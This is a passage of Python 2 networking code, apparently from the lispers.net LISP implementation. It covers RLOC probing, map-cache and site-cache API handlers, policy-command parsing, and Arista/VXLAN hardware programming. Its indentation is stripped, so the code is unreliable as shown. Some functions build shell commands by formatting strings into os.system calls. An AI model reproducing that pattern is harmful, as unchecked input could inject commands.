r["encap-port"] = str(rloc.translated_port)
#endif
r["state"] = rloc.print_state()
if (rloc.geo): r["geo"] = rloc.geo.print_geo()
if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
if (rloc.rle): r["rle"] = rloc.rle.print_rle(False)
if (rloc.json): r["json"] = rloc.json.print_json(False)
if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
stats = rloc.stats.get_stats(False, False)
if (stats): r["stats"] = stats
r["uptime"] = lisp_print_elapsed(rloc.uptime)
r["upriority"] = str(rloc.priority)
r["uweight"] = str(rloc.weight)
r["mpriority"] = str(rloc.mpriority)
r["mweight"] = str(rloc.mweight)
reply = rloc.last_rloc_probe_reply
if (reply):
r["last-rloc-probe-reply"] = lisp_print_elapsed(reply)
r["rloc-probe-rtt"] = str(rloc.rloc_probe_rtt)
#endif
r["rloc-hop-count"] = rloc.rloc_probe_hops
r["recent-rloc-hop-counts"] = rloc.recent_rloc_probe_hops
recent_rtts = []
for rtt in rloc.recent_rloc_probe_rtts: recent_rtts.append(str(rtt))
r["recent-rloc-probe-rtts"] = recent_rtts
rloc_set.append(r)
#endfor
entry["rloc-set"] = rloc_set
data.append(entry)
return([True, data])
#enddef
#
# lisp_process_api_map_cache_entry
#
# Parse API parameters in dictionary array, do longest match lookup.
#
def lisp_process_api_map_cache_entry(parms):
iid = parms["instance-id"]
iid = 0 if (iid == "") else int(iid)
#
# Get EID or source of (S,G).
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(parms["eid-prefix"])
dest = eid
source = eid
#
# See if we are doing a group lookup. Make that destination and the EID
# the source.
#
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
if (parms.has_key("group-prefix")):
group.store_prefix(parms["group-prefix"])
dest = group
#endif
data = []
mc = lisp_map_cache_lookup(source, dest)
if (mc): status, data = lisp_process_api_map_cache(mc, data)
return(data)
#enddef
#
# lisp_process_api_site_cache
#
# Return map-cache to API caller.
#
def lisp_process_api_site_cache(se, data):
#
# There is only destination state in this map-cache entry.
#
if (se.group.is_null()): return(lisp_gather_site_cache_data(se, data))
if (se.source_cache == None): return([True, data])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
data = se.source_cache.walk_cache(lisp_gather_site_cache_data, data)
return([True, data])
#enddef
#
# lisp_process_api_ms_or_mr
#
# Return map-cache to API caller.
#
def lisp_process_api_ms_or_mr(ms_or_mr, data):
address = lisp_address(LISP_AFI_NONE, "", 0, 0)
dns_name = data["dns-name"] if data.has_key("dns-name") else None
if (data.has_key("address")):
address.store_address(data["address"])
#endif
value = {}
if (ms_or_mr):
for ms in lisp_map_servers_list.values():
if (dns_name):
if (dns_name != ms.dns_name): continue
else:
if (address.is_exact_match(ms.map_server) == False): continue
#endif
value["dns-name"] = ms.dns_name
value["address"] = ms.map_server.print_address_no_iid()
value["ms-name"] = "" if ms.ms_name == None else ms.ms_name
return([value])
#endfor
else:
for mr in lisp_map_resolvers_list.values():
if (dns_name):
if (dns_name != mr.dns_name): continue
else:
if (address.is_exact_match(mr.map_resolver) == False): continue
#endif
value["dns-name"] = mr.dns_name
value["address"] = mr.map_resolver.print_address_no_iid()
value["mr-name"] = "" if mr.mr_name == None else mr.mr_name
return([value])
#endfor
#endif
return([])
#enddef
#
# lisp_process_api_database_mapping
#
# Return array of database-mappings configured, include dynamic data like
# translated_rloc in particular.
#
def lisp_process_api_database_mapping():
data = []
for db in lisp_db_list:
entry = {}
entry["eid-prefix"] = db.eid.print_prefix()
if (db.group.is_null() == False):
entry["group-prefix"] = db.group.print_prefix()
#endif
rlocs = []
for r in db.rloc_set:
rloc = {}
if (r.rloc.is_null() == False):
rloc["rloc"] = r.rloc.print_address_no_iid()
#endif
if (r.rloc_name != None): rloc["rloc-name"] = r.rloc_name
if (r.interface != None): rloc["interface"] = r.interface
tr = r.translated_rloc
if (tr.is_null() == False):
rloc["translated-rloc"] = tr.print_address_no_iid()
#endif
if (rloc != {}): rlocs.append(rloc)
#endfor
#
# Add RLOCs array to EID entry.
#
entry["rlocs"] = rlocs
#
# Add EID entry to return array.
#
data.append(entry)
#endfor
return(data)
#enddef
#
# lisp_gather_site_cache_data
#
# Return site-cache to API caller.
#
def lisp_gather_site_cache_data(se, data):
entry = {}
entry["site-name"] = se.site.site_name
entry["instance-id"] = str(se.eid.instance_id)
entry["eid-prefix"] = se.eid.print_prefix_no_iid()
if (se.group.is_null() == False):
entry["group-prefix"] = se.group.print_prefix_no_iid()
#endif
entry["registered"] = "yes" if se.registered else "no"
entry["first-registered"] = lisp_print_elapsed(se.first_registered)
entry["last-registered"] = lisp_print_elapsed(se.last_registered)
addr = se.last_registerer
addr = "none" if addr.is_null() else addr.print_address()
entry["last-registerer"] = addr
entry["ams"] = "yes" if (se.accept_more_specifics) else "no"
entry["dynamic"] = "yes" if (se.dynamic) else "no"
entry["site-id"] = str(se.site_id)
if (se.xtr_id_present):
entry["xtr-id"] = "0x"+ lisp_hex_string(se.xtr_id)
#endif
#
# Encode in RLOC-set which is an array of entries.
#
rloc_set = []
for rloc in se.registered_rlocs:
r = {}
r["address"] = rloc.rloc.print_address_no_iid() if rloc.rloc_exists() \
else "none"
if (rloc.geo): r["geo"] = rloc.geo.print_geo()
if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
if (rloc.rle): r["rle"] = rloc.rle.print_rle(False)
if (rloc.json): r["json"] = rloc.json.print_json(False)
if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
r["uptime"] = lisp_print_elapsed(rloc.uptime)
r["upriority"] = str(rloc.priority)
r["uweight"] = str(rloc.weight)
r["mpriority"] = str(rloc.mpriority)
r["mweight"] = str(rloc.mweight)
rloc_set.append(r)
#endfor
entry["registered-rlocs"] = rloc_set
data.append(entry)
return([True, data])
#enddef
#
# lisp_process_api_site_cache_entry
#
# Parse API parameters in dictionary array, do longest match lookup.
#
def lisp_process_api_site_cache_entry(parms):
iid = parms["instance-id"]
iid = 0 if (iid == "") else int(iid)
#
# Get EID or source of (S,G).
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(parms["eid-prefix"])
#
# See if we are doing a group lookup. Make that destination and the EID
# the source.
#
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
if (parms.has_key("group-prefix")):
group.store_prefix(parms["group-prefix"])
#endif
data = []
se = lisp_site_eid_lookup(eid, group, False)
if (se): lisp_gather_site_cache_data(se, data)
return(data)
#enddef
#
# lisp_get_interface_instance_id
#
# Return instance-ID from lisp_interface() class.
#
def lisp_get_interface_instance_id(device, source_eid):
interface = None
if (lisp_myinterfaces.has_key(device)):
interface = lisp_myinterfaces[device]
#endif
#
# Didn't find an instance-ID configured on a "lisp interface", return
# the default.
#
if (interface == None or interface.instance_id == None):
return(lisp_default_iid)
#endif
#
# If there is a single interface data structure for a given device,
# return the instance-ID conifgured for it. Otherwise, check to see
# if this is a multi-tenant EID-prefix. And then test all configured
# prefixes in each lisp_interface() for a best match. This allows
# for multi-tenancy on a single xTR interface.
#
iid = interface.get_instance_id()
if (source_eid == None): return(iid)
save_iid = source_eid.instance_id
best = None
for interface in lisp_multi_tenant_interfaces:
if (interface.device != device): continue
prefix = interface.multi_tenant_eid
source_eid.instance_id = prefix.instance_id
if (source_eid.is_more_specific(prefix) == False): continue
if (best == None or best.multi_tenant_eid.mask_len < prefix.mask_len):
best = interface
#endif
#endfor
source_eid.instance_id = save_iid
if (best == None): return(iid)
return(best.get_instance_id())
#enddef
#
# lisp_allow_dynamic_eid
#
# Returns dynamic-eid-deivce (or device if "dynamic-eid-device" not configured)
# if supplied EID matches configured dynamic-EID in a "lisp interface" command.
# Otherwise, returns None.
#
def lisp_allow_dynamic_eid(device, eid):
if (lisp_myinterfaces.has_key(device) == False): return(None)
interface = lisp_myinterfaces[device]
return_interface = device if interface.dynamic_eid_device == None else \
interface.dynamic_eid_device
if (interface.does_dynamic_eid_match(eid)): return(return_interface)
return(None)
#enddef
#
# lisp_start_rloc_probe_timer
#
# Set the RLOC-probe timer to expire in 1 minute (by default).
#
def lisp_start_rloc_probe_timer(interval, lisp_sockets):
global lisp_rloc_probe_timer
if (lisp_rloc_probe_timer != None): lisp_rloc_probe_timer.cancel()
func = lisp_process_rloc_probe_timer
timer = threading.Timer(interval, func, [lisp_sockets])
lisp_rloc_probe_timer = timer
timer.start()
return
#enddef
#
# lisp_show_rloc_probe_list
#
# Print out the lisp_show_rloc_probe_list in a readable way for debugging.
#
def lisp_show_rloc_probe_list():
lprint(bold("----- RLOC-probe-list -----", False))
for key in lisp_rloc_probe_list:
rloc_array = lisp_rloc_probe_list[key]
lprint("RLOC {}:".format(key))
for r, e, g in rloc_array:
lprint(" [{}, {}, {}, {}]".format(hex(id(r)), e.print_prefix(),
g.print_prefix(), r.translated_port))
#endfor
#endfor
lprint(bold("---------------------------", False))
return
#enddef
#
# lisp_mark_rlocs_for_other_eids
#
# When the parent RLOC that we have RLOC-probe state for comes reachable or
# goes unreachable, set the state appropriately for other EIDs using the SAME
# RLOC. The parent is the first RLOC in the eid-list.
#
def lisp_mark_rlocs_for_other_eids(eid_list):
#
# Don't process parent but put its EID in printed list.
#
rloc, e, g = eid_list[0]
eids = [lisp_print_eid_tuple(e, g)]
for rloc, e, g in eid_list[1::]:
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
eids.append(lisp_print_eid_tuple(e, g))
#endfor
unreach = bold("unreachable", False)
rloc_str = red(rloc.rloc.print_address_no_iid(), False)
for eid in eids:
e = green(eid, False)
lprint("RLOC {} went {} for EID {}".format(rloc_str, unreach, e))
#endfor
#
# For each EID, tell external data-plane about new RLOC-set (RLOCs minus
# the ones that just went unreachable).
#
for rloc, e, g in eid_list:
mc = lisp_map_cache.lookup_cache(e, True)
if (mc): lisp_write_ipc_map_cache(True, mc)
#endfor
return
#enddef
#
# lisp_process_rloc_probe_timer
#
# Periodic RLOC-probe timer has expired. Go through cached RLOCs from map-
# cache and decide to suppress or rate-limit RLOC-probes. This function
# is also used to time out "unreachability" state so we can start RLOC-probe
# a previously determined unreachable RLOC.
#
def lisp_process_rloc_probe_timer(lisp_sockets):
lisp_set_exception()
lisp_start_rloc_probe_timer(LISP_RLOC_PROBE_INTERVAL, lisp_sockets)
if (lisp_rloc_probing == False): return
#
# Debug code. Must rebuild image to set boolean to True.
#
if (lisp_print_rloc_probe_list): lisp_show_rloc_probe_list()
#
# Check for egress multi-homing.
#
default_next_hops = lisp_get_default_route_next_hops()
lprint("---------- Start RLOC Probing for {} entries ----------".format( \
len(lisp_rloc_probe_list)))
#
# Walk the list.
#
count = 0
probe = bold("RLOC-probe", False)
for values in lisp_rloc_probe_list.values():
#
# Just do one RLOC-probe for the RLOC even if it is used for
# multiple EID-prefixes.
#
last_rloc = None
for parent_rloc, eid, group in values:
addr_str = parent_rloc.rloc.print_address_no_iid()
#
# Do not send RLOC-probes to RLOCs that are in down-state or admin-
# down-state. The RLOC-probe reply will apply for all EID-prefixes
# and the RLOC state will be updated for each.
#
if (parent_rloc.down_state()): continue
#
# Do not send multiple RLOC-probes to the same RLOC for
# different EID-prefixes. Multiple RLOC entries could have
# same RLOC address but differnet translated ports. These
# need to be treated as different ETRs (they are both behind
# the same NAT) from an RTR's perspective. On an ITR, if the
# RLOC-names are different for the same RLOC address, we need
# to treat these as different ETRs since an ITR does not keep
# port state for an RLOC.
#
if (last_rloc):
parent_rloc.last_rloc_probe_nonce = \
last_rloc.last_rloc_probe_nonce
if (last_rloc.translated_port == parent_rloc.translated_port \
and last_rloc.rloc_name == parent_rloc.rloc_name):
e = green(lisp_print_eid_tuple(eid, group), False)
lprint("Suppress probe to duplicate RLOC {} for {}". \
format(red(addr_str, False), e))
continue
#endif
#endif
nh = None
rloc = None
while (True):
rloc = parent_rloc if rloc == None else rloc.next_rloc
if (rloc == None): break
#
# First check if next-hop/interface is up for egress multi-
# homing.
#
if (rloc.rloc_next_hop != None):
if (rloc.rloc_next_hop not in default_next_hops):
if (rloc.up_state()):
d, n = rloc.rloc_next_hop
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
lisp_update_rtr_updown(rloc.rloc, False)
#endif
unreach = bold("unreachable", False)
lprint("Next-hop {}({}) for RLOC {} is {}".format(n, d,
red(addr_str, False), unreach))
continue
#endif
#endif
#
# Send RLOC-probe to unreach-state RLOCs if down for a minute.
#
last = rloc.last_rloc_probe
delta = 0 if last == None else time.time() - last
if (rloc.unreach_state() and delta < LISP_RLOC_PROBE_INTERVAL):
lprint("Waiting for probe-reply from RLOC {}".format( \
red(addr_str, False)))
continue
#endif
#
# Check to see if we are in nonce-echo mode and no echo has
# been returned.
#
echo_nonce = lisp_get_echo_nonce(None, addr_str)
if (echo_nonce and echo_nonce.request_nonce_timeout()):
rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc.last_state_change = lisp_get_timestamp()
unreach = bold("unreachable", False)
lprint("RLOC {} went {}, nonce-echo failed".format( \
red(addr_str, False), unreach))
lisp_update_rtr_updown(rloc.rloc, False)
continue
#endif
#
# Suppress sending RLOC probe if we just a nonce-echo in the
# last minute.
#
if (echo_nonce and echo_nonce.recently_echoed()):
lprint(("Suppress RLOC-probe to {}, nonce-echo " + \
"received").format(red(addr_str, False)))
continue
#endif
#
# Check if we have not received a RLOC-probe reply for one
# timer interval. If not, put RLOC state in "unreach-state".
#
if (rloc.last_rloc_probe != None):
last = rloc.last_rloc_probe_reply
if (last == None): last = 0
delta = time.time() - last
if (rloc.up_state() and \
delta >= LISP_RLOC_PROBE_REPLY_WAIT):
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
lisp_update_rtr_updown(rloc.rloc, False)
unreach = bold("unreachable", False)
lprint("RLOC {} went {}, probe it".format( \
red(addr_str, False), unreach))
lisp_mark_rlocs_for_other_eids(values)
#endif
#endif
rloc.last_rloc_probe = lisp_get_timestamp()
reach = "" if rloc.unreach_state() == False else " unreachable"
#
# Send Map-Request RLOC-probe. We may have to send one for each
# egress interface to the same RLOC address. Install host
# route in RLOC so we can direct the RLOC-probe on an egress
# interface.
#
nh_str = ""
n = None
if (rloc.rloc_next_hop != None):
d, n = rloc.rloc_next_hop
lisp_install_host_route(addr_str, n, True)
nh_str = ", send on nh {}({})".format(n, d)
#endif
#
# Print integrated log message before sending RLOC-probe.
#
rtt = rloc.print_rloc_probe_rtt()
astr = addr_str
if (rloc.translated_port != 0):
astr += ":{}".format(rloc.translated_port)
#endif
astr= red(astr, False)
if (rloc.rloc_name != None):
astr += " (" + blue(rloc.rloc_name, False) + ")"
#endif
lprint("Send {}{} {}, last rtt: {}{}".format(probe, reach,
astr, rtt, nh_str))
#
# If we are doing multiple egress interfaces, check for host
# routes. We don't want the ones we selected for forwarding to
# affect the path RLOC-probes go out in the following loop. We
# will restore the host route while waiting for RLOC-replies.
# Then we'll select a new host route based on best RTT.
#
if (rloc.rloc_next_hop != None):
nh = lisp_get_host_route_next_hop(addr_str)
if (nh): lisp_install_host_route(addr_str, nh, False)
#endif
#
# Might be first time and other RLOCs on the chain may not
# have RLOC address. Copy now.
#
if (rloc.rloc.is_null()):
rloc.rloc.copy_address(parent_rloc.rloc)
#endif
#
# Send RLOC-probe Map-Request.
#
seid = None if (group.is_null()) else eid
deid = eid if (group.is_null()) else group
lisp_send_map_request(lisp_sockets, 0, seid, deid, rloc)
last_rloc = parent_rloc
#
# Remove installed host route.
#
if (n): lisp_install_host_route(addr_str, n, False)
#endwhile
#
# Reisntall host route for forwarding.
#
if (nh): lisp_install_host_route(addr_str, nh, True)
#
# Send 10 RLOC-probes and then sleep for 20 ms.
#
count += 1
if ((count % 10) == 0): time.sleep(0.020)
#endfor
#endfor
lprint("---------- End RLOC Probing ----------")
return
#enddef
#
# lisp_update_rtr_updown
#
# The lisp-itr process will send an IPC message to the lisp-etr process for
# the RLOC-probe status change for an RTR.
#
def lisp_update_rtr_updown(rtr, updown):
global lisp_ipc_socket
#
# This is only done on an ITR.
#
if (lisp_i_am_itr == False): return
#
# When the xtr-parameter indicates to register all RTRs, we are doing it
# conditionally so we don't care about the status. Suppress IPC messages.
#
if (lisp_register_all_rtrs): return
rtr_str = rtr.print_address_no_iid()
#
# Check if RTR address is in LISP the lisp-itr process learned from the
# map-server.
#
if (lisp_rtr_list.has_key(rtr_str) == False): return
updown = "up" if updown else "down"
lprint("Send ETR IPC message, RTR {} has done {}".format(
red(rtr_str, False), bold(updown, False)))
#
# Build IPC message.
#
ipc = "rtr%{}%{}".format(rtr_str, updown)
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
return
#enddef
#
# lisp_process_rloc_probe_reply
#
# We have received a RLOC-probe Map-Reply, process it.
#
def lisp_process_rloc_probe_reply(rloc_addr, source, port, nonce, hop_count,
ttl):
probe = bold("RLOC-probe reply", False)
map_reply_addr = rloc_addr.print_address_no_iid()
source_addr = source.print_address_no_iid()
pl = lisp_rloc_probe_list
#
# If we can't find RLOC address from the Map-Reply in the probe-list,
# maybe the same ETR is sending sourcing from a different address. Check
# that address in the probe-list.
#
addr = map_reply_addr
if (pl.has_key(addr) == False):
addr += ":" + str(port)
if (pl.has_key(addr) == False):
addr = source_addr
if (pl.has_key(addr) == False):
addr += ":" + str(port)
lprint(" Received unsolicited {} from {}/{}".format(probe,
red(map_reply_addr, False), red(source_addr, False)))
return
#endif
#endif
#endif
#
# Look for RLOC in the RLOC-probe list for EID tuple and fix-up stored
# RLOC-probe state.
#
for rloc, eid, group in lisp_rloc_probe_list[addr]:
if (lisp_i_am_rtr and rloc.translated_port != 0 and
rloc.translated_port != port): continue
rloc.process_rloc_probe_reply(nonce, eid, group, hop_count, ttl)
#endfor
return
#enddef
#
# lisp_db_list_length
#
# Returns the number of entries that need to be registered. This will include
# static and dynamic EIDs.
#
def lisp_db_list_length():
count = 0
for db in lisp_db_list:
count += len(db.dynamic_eids) if db.dynamic_eid_configured() else 1
count += len(db.eid.iid_list)
#endif
return(count)
#endif
#
# lisp_is_myeid
#
# Return true if supplied EID is the EID for this system.
#
def lisp_is_myeid(eid):
for db in lisp_db_list:
if (db.eid.is_exact_match(eid)): return(True)
#endfor
return(False)
#enddef
#
# lisp_format_macs
#
# Take two MAC address strings and format them with dashes and place them in
# a format string "0000-1111-2222 -> 3333-4444-5555" for displaying in
# lisp.dprint().
#
def lisp_format_macs(sa, da):
sa = sa[0:4] + "-" + sa[4:8] + "-" + sa[8:12]
da = da[0:4] + "-" + da[4:8] + "-" + da[8:12]
return("{} -> {}".format(sa, da))
#enddef
#
# lisp_get_echo_nonce
#
# Get lisp_nonce_echo() state from lisp_nonce_echo_list{}.
#
def lisp_get_echo_nonce(rloc, rloc_str):
if (lisp_nonce_echoing == False): return(None)
if (rloc): rloc_str = rloc.print_address_no_iid()
echo_nonce = None
if (lisp_nonce_echo_list.has_key(rloc_str)):
echo_nonce = lisp_nonce_echo_list[rloc_str]
#endif
return(echo_nonce)
#enddef
#
# lisp_decode_dist_name
#
# When we have reached an AFI=17 in an EID or RLOC record, return the
# distinguished name, and new position of packet.
#
def lisp_decode_dist_name(packet):
count = 0
dist_name = ""
while(packet[0:1] != "\0"):
if (count == 255): return([None, None])
dist_name += packet[0:1]
packet = packet[1::]
count += 1
#endwhile
packet = packet[1::]
return(packet, dist_name)
#enddef
#
# lisp_write_flow_log
#
# The supplied flow_log variable is an array of [datetime, lisp_packet]. This
# function is called and run in its own thread and then exits.
#
def lisp_write_flow_log(flow_log):
f = open("./logs/lisp-flow.log", "a")
count = 0
for flow in flow_log:
packet = flow[3]
flow_str = packet.print_flow(flow[0], flow[1], flow[2])
f.write(flow_str)
count += 1
#endfor
f.close()
del(flow_log)
count = bold(str(count), False)
lprint("Wrote {} flow entries to ./logs/lisp-flow.log".format(count))
return
#enddef
#
# lisp_policy_command
#
# Configure "lisp policy" commands for all processes that need it.
#
def lisp_policy_command(kv_pair):
p = lisp_policy("")
set_iid = None
match_set = []
for i in range(len(kv_pair["datetime-range"])):
match_set.append(lisp_policy_match())
#endfor
for kw in kv_pair.keys():
value = kv_pair[kw]
#
# Check for match parameters.
#
if (kw == "instance-id"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.source_eid == None):
match.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
if (match.dest_eid == None):
match.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
match.source_eid.instance_id = int(v)
match.dest_eid.instance_id = int(v)
#endfor
#endif
if (kw == "source-eid"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.source_eid == None):
match.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
iid = match.source_eid.instance_id
match.source_eid.store_prefix(v)
match.source_eid.instance_id = iid
#endfor
#endif
if (kw == "destination-eid"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.dest_eid == None):
match.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
iid = match.dest_eid.instance_id
match.dest_eid.store_prefix(v)
match.dest_eid.instance_id = iid
#endfor
#endif
if (kw == "source-rloc"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.source_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
match.source_rloc.store_prefix(v)
#endfor
#endif
if (kw == "destination-rloc"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.dest_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
match.dest_rloc.store_prefix(v)
#endfor
#endif
if (kw == "rloc-record-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.rloc_record_name = v
#endfor
#endif
if (kw == "geo-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.geo_name = v
#endfor
#endif
if (kw == "elp-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.elp_name = v
#endfor
#endif
if (kw == "rle-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.rle_name = v
#endfor
#endif
if (kw == "json-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.json_name = v
#endfor
#endif
if (kw == "datetime-range"):
for i in range(len(match_set)):
v = value[i]
match = match_set[i]
if (v == ""): continue
l = lisp_datetime(v[0:19])
u = lisp_datetime(v[19::])
if (l.valid_datetime() and u.valid_datetime()):
match.datetime_lower = l
match.datetime_upper = u
#endif
#endfor
#endif
#
# Check for set parameters.
#
if (kw == "set-action"):
p.set_action = value
#endif
if (kw == "set-record-ttl"):
p.set_record_ttl = int(value)
#endif
if (kw == "set-instance-id"):
if (p.set_source_eid == None):
p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
if (p.set_dest_eid == None):
p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
set_iid = int(value)
p.set_source_eid.instance_id = set_iid
p.set_dest_eid.instance_id = set_iid
#endif
if (kw == "set-source-eid"):
if (p.set_source_eid == None):
p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
p.set_source_eid.store_prefix(value)
if (set_iid != None): p.set_source_eid.instance_id = set_iid
#endif
if (kw == "set-destination-eid"):
if (p.set_dest_eid == None):
p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
p.set_dest_eid.store_prefix(value)
if (set_iid != None): p.set_dest_eid.instance_id = set_iid
#endif
if (kw == "set-rloc-address"):
p.set_rloc_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
p.set_rloc_address.store_address(value)
#endif
if (kw == "set-rloc-record-name"):
p.set_rloc_record_name = value
#endif
if (kw == "set-elp-name"):
p.set_elp_name = value
#endif
if (kw == "set-geo-name"):
p.set_geo_name = value
#endif
if (kw == "set-rle-name"):
p.set_rle_name = value
#endif
if (kw == "set-json-name"):
p.set_json_name = value
#endif
if (kw == "policy-name"):
p.policy_name = value
#endif
#endfor
#
# Store match clauses and policy.
#
p.match_clauses = match_set
p.save_policy()
return
#enddef
lisp_policy_commands = {
"lisp policy" : [lisp_policy_command, {
"policy-name" : [True],
"match" : [],
"instance-id" : [True, 0, 0xffffffff],
"source-eid" : [True],
"destination-eid" : [True],
"source-rloc" : [True],
"destination-rloc" : [True],
"rloc-record-name" : [True],
"elp-name" : [True],
"geo-name" : [True],
"rle-name" : [True],
"json-name" : [True],
"datetime-range" : [True],
"set-action" : [False, "process", "drop"],
"set-record-ttl" : [True, 0, 0x7fffffff],
"set-instance-id" : [True, 0, 0xffffffff],
"set-source-eid" : [True],
"set-destination-eid" : [True],
"set-rloc-address" : [True],
"set-rloc-record-name" : [True],
"set-elp-name" : [True],
"set-geo-name" : [True],
"set-rle-name" : [True],
"set-json-name" : [True] } ]
}
#
# lisp_send_to_arista
#
# Send supplied CLI command to Arista so it can be configured via its design
# rules.
#
def lisp_send_to_arista(command, interface):
interface = "" if (interface == None) else "interface " + interface
cmd_str = command
if (interface != ""): cmd_str = interface + ": " + cmd_str
lprint("Send CLI command '{}' to hardware".format(cmd_str))
commands = '''
enable
configure
{}
{}
'''.format(interface, command)
os.system("FastCli -c '{}'".format(commands))
return
#enddef
#
# lisp_arista_is_alive
#
# Ask hardware if EID-prefix is alive. Return True if so.
#
def lisp_arista_is_alive(prefix):
cmd = "enable\nsh plat trident l3 software routes {}\n".format(prefix)
output = commands.getoutput("FastCli -c '{}'".format(cmd))
#
# Skip over header line.
#
output = output.split("\n")[1]
flag = output.split(" ")
flag = flag[-1].replace("\r", "")
#
# Last column has "Y" or "N" for hit bit.
#
return(flag == "Y")
#enddef
#
# lisp_program_vxlan_hardware
#
# This function is going to populate hardware that can do VXLAN encapsulation.
# It will add an IPv4 route via the kernel pointing to a next-hop on a
# VLAN interface that is being bridged to other potential VTEPs.
#
# The responsibility of this routine is to do the following programming:
#
# route add <eid-prefix> <next-hop>
# arp -s <next-hop> <mac-address>
#
# to the kernel and to do this Arista specific command:
#
# mac address-table static <mac-address> vlan 4094 interface vxlan 1
# vtep <vtep-address>
#
# Assumptions are:
#
# (1) Next-hop address is on the subnet for interface vlan4094.
# (2) VXLAN routing is already setup and will bridge <mac-address> to
# the VTEP address this function supplies.
# (3) A "ip virtual-router mac-address" is configured that will match the
# algorithmic mapping this function is doing between VTEP's IP address
# and the MAC address it will listen on to do VXLAN routing.
#
# The required configuration on the VTEPs are:
#
# vlan 4094
# interface vlan4094
# ip address ... ! <next-hop> above point to subnet
#
# interface Vxlan1
# vxlan source-interface Loopback0
# vxlan vlan 4094 vni 10000
# vxlan flood vtep add 17.17.17.17 ! any address to bring up vlan4094
#
# int loopback0
# ip address a.b.c.d/m ! this is the VTEP or RLOC <vtep-address>
#
# ip virtual-router mac-address 0000.00bb.ccdd
#
def lisp_program_vxlan_hardware(mc):
#
# For now, only do this on an Arista system. There isn't a python
# specific signature so just look to see if /persist/local/lispers.net
# exists.
#
if (os.path.exists("/persist/local/lispers.net") == False): return
#
# If no RLOCs, just return. Otherwise program the first RLOC.
#
if (len(mc.best_rloc_set) == 0): return
#
# Get EID-prefix and RLOC (VTEP address) in string form.
#
eid_prefix = mc.eid.print_prefix_no_iid()
rloc = mc.best_rloc_set[0].rloc.print_address_no_iid()
#
# Check to see if route is already present. If so, just return.
#
route = commands.getoutput("ip route get {} | egrep vlan4094".format( \
eid_prefix))
if (route != ""):
lprint("Route {} already in hardware: '{}'".format( \
green(eid_prefix, False), route))
return
#endif
#
# Look for a vxlan interface and a vlan4094 interface. If they do not
# exist, issue message and return. If we don't have an IP address on
# vlan4094, then exit as well.
#
ifconfig = commands.getoutput("ifconfig | egrep 'vxlan|vlan4094'")
if (ifconfig.find("vxlan") == -1):
lprint("No VXLAN interface found, cannot program hardware")
return
#endif
if (ifconfig.find("vlan4094") == -1):
lprint("No vlan4094 interface found, cannot program hardware")
return
#endif
ipaddr = commands.getoutput("ip addr | egrep vlan4094 | egrep inet")
if (ipaddr == ""):
lprint("No IP address found on vlan4094, cannot program hardware")
return
#endif
ipaddr = ipaddr.split("inet ")[1]
ipaddr = ipaddr.split("/")[0]
#
# Get a unique next-hop IP address on vlan4094's subnet. To be used as
# a handle to get VTEP's mac address. And then that VTEP's MAC address
# is a handle to tell VXLAN to encapsulate IP packet (with frame header)
# to the VTEP address.
#
arp_entries = []
arp_lines = commands.getoutput("arp -i vlan4094").split("\n")
for line in arp_lines:
if (line.find("vlan4094") == -1): continue
if (line.find("(incomplete)") == -1): continue
nh = line.split(" ")[0]
arp_entries.append(nh)
#endfor
nh = None
local = ipaddr
ipaddr = ipaddr.split(".")
for i in range(1, 255):
ipaddr[3] = str(i)
addr = ".".join(ipaddr)
if (addr in arp_entries): continue
if (addr == local): continue
nh = addr
break
#endfor
if (nh == None):
lprint("Address allocation failed for vlan4094, cannot program " + \
"hardware")
return
#endif
#
# Derive MAC address from VTEP address an associate it with the next-hop
# address on vlan4094. This MAC address must be the MAC address on the
# foreign VTEP configure with "ip virtual-router mac-address <mac>".
#
rloc_octets = rloc.split(".")
octet1 = lisp_hex_string(rloc_octets[1]).zfill(2)
octet2 = lisp_hex_string(rloc_octets[2]).zfill(2)
octet3 = lisp_hex_string(rloc_octets[3]).zfill(2)
mac = "00:00:00:{}:{}:{}".format(octet1, octet2, octet3)
arista_mac = "0000.00{}.{}{}".format(octet1, octet2, octet3)
arp_command = "arp -i vlan4094 -s {} {}".format(nh, mac)
os.system(arp_command)
#
